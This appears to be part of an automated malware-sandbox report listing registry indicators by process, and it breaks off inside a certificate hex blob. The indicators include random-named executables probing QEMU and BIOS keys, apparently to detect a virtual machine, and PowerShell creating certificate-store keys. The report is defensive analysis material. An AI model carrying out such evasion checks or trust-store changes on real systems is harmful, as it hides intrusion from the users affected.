description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 Snetchball.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 Snetchball.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags Snetchball.exe -
Enumerates system info in registry 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS cihvqPa9fiUGQzUJzD3H.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName cihvqPa9fiUGQzUJzD3H.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies Control Panel 13 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" Snetchball.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" Snetchball.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" Snetchball.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" Snetchball.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" Snetchball.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" Snetchball.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" Snetchball.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" Snetchball.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" Snetchball.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" Snetchball.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" Snetchball.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" Snetchball.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" Snetchball.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer cihvqPa9fiUGQzUJzD3H.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" fyArOsB.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix fyArOsB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{50662fab-0000-0000-0000-d01200000000}\MaxCapacity = "14116" fyArOsB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume fyArOsB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" fyArOsB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{50662fab-0000-0000-0000-d01200000000} fyArOsB.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" fyArOsB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing fyArOsB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe -
Modifies registry class 34 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\qBittorrent.File.Torrent\shell\open\command qbittorrent_5.0.1_x64_setup.exe Key created \REGISTRY\MACHINE\Software\Classes\qBittorrent.Url.Magnet\DefaultIcon qbittorrent_5.0.1_x64_setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\qBittorrent.Url.Magnet qbittorrent_5.0.1_x64_setup.exe Key created \REGISTRY\MACHINE\Software\Classes\magnet qbittorrent_5.0.1_x64_setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" BackgroundTransferHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\qBittorrent.File.Torrent\ = "Torrent File" qbittorrent_5.0.1_x64_setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\qBittorrent.File.Torrent qbittorrent_5.0.1_x64_setup.exe Key created \REGISTRY\MACHINE\Software\Classes\qBittorrent.File.Torrent qbittorrent_5.0.1_x64_setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\qBittorrent.File.Torrent\shell\open\command\ = "\"C:\\Program Files\\qBittorrent\\qbittorrent.exe\" \"%1\"" qbittorrent_5.0.1_x64_setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\magnet\Content Type = "application/x-magnet" qbittorrent_5.0.1_x64_setup.exe Key created \REGISTRY\MACHINE\Software\Classes\qBittorrent.Url.Magnet qbittorrent_5.0.1_x64_setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\qBittorrent.Url.Magnet\shell\open\command qbittorrent_5.0.1_x64_setup.exe Key created \REGISTRY\MACHINE\Software\Classes\.torrent qbittorrent_5.0.1_x64_setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix BackgroundTransferHost.exe Key created \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\MuiCache BackgroundTransferHost.exe Key created \REGISTRY\MACHINE\Software\Classes\qBittorrent.File.Torrent\DefaultIcon qbittorrent_5.0.1_x64_setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\qBittorrent.File.Torrent\DefaultIcon\ = "\"C:\\Program Files\\qBittorrent\\qbittorrent.exe\",1" qbittorrent_5.0.1_x64_setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\qBittorrent.Url.Magnet\DefaultIcon\ = "\"C:\\Program Files\\qBittorrent\\qbittorrent.exe\",1" qbittorrent_5.0.1_x64_setup.exe Key created \REGISTRY\MACHINE\Software\Classes\qBittorrent.Url.Magnet\shell\open\command qbittorrent_5.0.1_x64_setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\qBittorrent.Url.Magnet\shell\open\command\ = "\"C:\\Program Files\\qBittorrent\\qbittorrent.exe\" \"%1\"" qbittorrent_5.0.1_x64_setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\magnet\URL Protocol qbittorrent_5.0.1_x64_setup.exe Key created \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings bommixpro.exe Key created \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings qbittorrent.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\qBittorrent.File.Torrent\shell\open qbittorrent_5.0.1_x64_setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\qBittorrent.File.Torrent\shell\open\command qbittorrent_5.0.1_x64_setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.torrent\Content Type = "application/x-bittorrent" qbittorrent_5.0.1_x64_setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\magnet\ = "URL:Magnet URI" qbittorrent_5.0.1_x64_setup.exe Key created \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings The Longing.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\qBittorrent.File.Torrent\shell qbittorrent_5.0.1_x64_setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\qBittorrent.Url.Magnet\ = "Magnet URI" qbittorrent_5.0.1_x64_setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\qBittorrent.Url.Magnet\shell qbittorrent_5.0.1_x64_setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\qBittorrent.Url.Magnet\shell\open qbittorrent_5.0.1_x64_setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" BackgroundTransferHost.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae4747e000000010000000800000000c001b39667d6017f000000010000000c000000300a06082b060105050703091d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb0b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b0601050507030853000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacf